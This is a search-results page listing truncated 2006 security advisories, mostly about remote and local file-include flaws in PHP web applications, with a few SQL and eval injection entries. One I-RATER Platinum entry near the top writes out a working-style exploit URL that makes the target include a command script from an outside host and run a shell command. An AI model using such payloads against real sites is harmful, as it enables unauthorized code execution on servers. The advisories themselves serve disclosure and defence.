8843 matches found
[Kurdish Secure Advisory #1] I-RATER Platinum "Admin/configsettings.tpl.php" Remote File Include Vulnerability
Website : http://www.i-rater.com Risk : High Class : Remote References : http://www.securityfocus.com/bid/17623 Credits : B3g0k,Nistiman,Flot,Netqurd and all my friend Remote Code : http://www.site.com/admin/configsettings.tpl.php?includepath=http://www.evilrox.com/cmd.txt?&cmd=id...
[Kurdish Security #2] Artmedic Event Remote File Include Vulnerability
Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/artmedic-event-remote-file-include.html Artmedic Event Remote File Include Vulnerability Website : http://www.artmedic.de/ Script : Artmedic Event Script Risk : High Class : Remote Greetz : B3g0k,Nistiman,Flot,Netqurd etc.. d0rk :...
phpMyAgenda-3.0.txt
MajorSecurity phpMyAgenda 3.0 Final - Remote File Include Vulnerability -------------------------------------------------------- Software: phpMyAgenda Version: 3.0 Final Type: Remote File Include Vulnerability Date: April, 24th 2006 Vendor: phpMyAgenda Page: http://phpmyagenda.com Risk: High...
Sql injection
Eval injection vulnerability in index.php in ClanSys 1.1 allows remote attackers to execute arbitrary PHP code via PHP code in the page parameter, as demonstrated by using an "include" statement that is injected into the eval statement. NOTE: this issue has been described as file inclusion by som...
[MajorSecurity] phpMyAgenda 3.0 Final - Remote File Include Vulnerability
MajorSecurity phpMyAgenda 3.0 Final - Remote File Include Vulnerability -------------------------------------------------------- Software: phpMyAgenda Version: 3.0 Final Type: Remote File Include Vulnerability Date: April, 24th 2006 Vendor: phpMyAgenda Page: http://phpmyagenda.com Risk: High...
[MajorSecurity] TotalCalendar 2.30 - Remote File Include Vulnerability
MajorSecurity TotalCalendar 2.30 - Remote File Include Vulnerability -------------------------------------------------------- Software: TotalCalendar Version: 2.30 Type: Remote File Include Vulnerability Date: April, 23th 2006 Vendor: SweetPHP Page: http://sweetphp.com Risk: High Credits:...
Sql injection
SQL injection vulnerability in index.php in PMTool 1.2.2 allows remote attackers to execute arbitrary SQL commands via the order parameter in the include files (1) user.inc.php, (2) customer.inc.php, and (3) project.inc.php. NOTE: the provenance of this information is unknown; the details are obtained...
I-RATER Platinum - Common.php Remote File Inclusion
I-RATER Platinum - Common.php Remote File Inclusion source: https://www.securityfocus.com/bid/17623/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue...
I-RATER Platinum - 'Common.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/17623/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing...
[MajorSecurity]ActualAnalyzer - Remote File Include Vulnerability
MajorSecurity ActualAnalyzer - Remote File Include Vulnerability ----------------------------------------------------------- Software: ActualAnalyzer Type: Remote File Include Vulnerability Date: April, 19th 2006 Vendor: ActualScripts Page: http://actualscripts.com Risk: High Credits:...
Blursoft Blur6ex 0.3.462 - index.php Local File Inclusion
Blursoft Blur6ex 0.3.462 - index.php Local File Inclusion source: https://www.securityfocus.com/bid/17554/info Blur6ex is prone to a local file-include vulnerability that may allow an unauthorized user to view files and to execute local scripts...
phpWebFTP index.php language Parameter Local File Inclusion
The remote host is running phpWebFTP, a web-based FTP client written in PHP. The version of phpWebFTP installed on the remote host fails to sanitize user-supplied input to the 'language' parameter of the 'index.php' script before using it in a PHP 'include' function. An unauthenticated attacker m...
Coppermine 1.4.4 - 'index.php' Local File Inclusion
source: https://www.securityfocus.com/bid/17570/info Coppermine is prone to a local file-include vulnerability. This may allow unauthorized users to view files and to execute local scripts. Version 1.4.4 is vulnerable to this issue; other versions may also be affected...
PAJAX < 0.5.2 Multiple Vulnerabilities
The remote host is running PAJAX, a PHP library for remote asynchronous objects in JavaScript. The version of PAJAX installed on the remote host fails to validate input to the 'pajax/pajaxcalldispatcher.php' script before using it in a PHP 'eval' function. An unauthenticated attacker can exploit...
phpListPro <= 2.0 - Remote File Include Vulnerability
phpListPro <= 2.0 - Remote File Include Vulnerability -------------------------------------------------------- Software: phpListPro Version: <=2.00 Type: Remote File Include Vulnerability Date: April, 11th 2006 Vendor: SmartISoft Page: http://smartisoft.com Risk: High Credits:...
AzDGVote - Remote File Inclusion
source: https://www.securityfocus.com/bid/17447/info AzDGVote is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious PH...
Shopweezle 2.0 multiple vuln.
Shopweezle 2.0 multiple vuln. Vuln. discovered by : r0t Date: 9 April 2006 vendor: http://shopweezle.de/ affected versions: ShopWeezle PERSONAL ShopWeezle PROFESSIONAL ShopWeezle PROFESSIONAL+ original advisory: http://pridels.blogspot.com/2006/04/shopweezle-20-multiple-vuln.html Vuln. description:...
CVE-2005-4748
Technical details about CVE-2005-4748 are not publicly provided in the supplied documents; no concrete vulnerabilities, affected versions, or fixes are described. Monitor for updates.
MediaSlash Gallery - 'index.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/17323/info MediaSlash Gallery is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing...
Code injection
TWiki 4.0, 4.0.1, and 20010901 through 20040904 allows remote authenticated users with edit rights to cause a denial of service (infinite recursion leading to CPU and memory consumption) via INCLUDE by URL statements that form a loop, such as a page that includes itself...